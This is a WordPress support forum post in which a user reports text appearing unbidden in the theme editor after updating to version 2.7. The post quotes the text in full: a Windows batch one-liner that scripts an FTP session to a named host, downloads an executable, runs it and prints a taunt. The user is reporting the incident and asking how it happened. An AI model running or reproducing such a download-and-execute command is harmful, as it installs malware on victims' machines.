possible malicious attack within WordPress admin panel

  • hi.
    i just updated my blog to v2.7
    i had to edit my sidebar content so i opened the theme editor and something really weird started to happen.
    as soon as i clicked within the textfield, some text automatically started to appear at the cursor.

    cmd c echo open ftp.dopedgod.com 21>> ik & echo user [email protected] botpass>> ik & echo binary>> ik & echo get dllhook.exe>> ik & echo bye>> ik & ftp-n-v-s: ik of ik & & & exit dllhook.exe
echo You got owned

    this seems like windows batch code to connect to a server and download an executable and execute it. and display the message You got owned.

    i have absolutely no idea what could have caused this, this is the first time ever i have been a victim of such a malicious attack, i’m always careful to update my antivirus and other protection.

    funniest thing is. i’m on Mac OS X 10.5.3 right now so the code has no potential harm for the system. what’s bugging me is how could this have happened.

    system info:
    OS: Mac OS X 10.5.3
    Browser: Firefox 3.0.5 with AdBlock Plus

Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘possible malicious attack within WordPress admin panel’ is closed to new replies.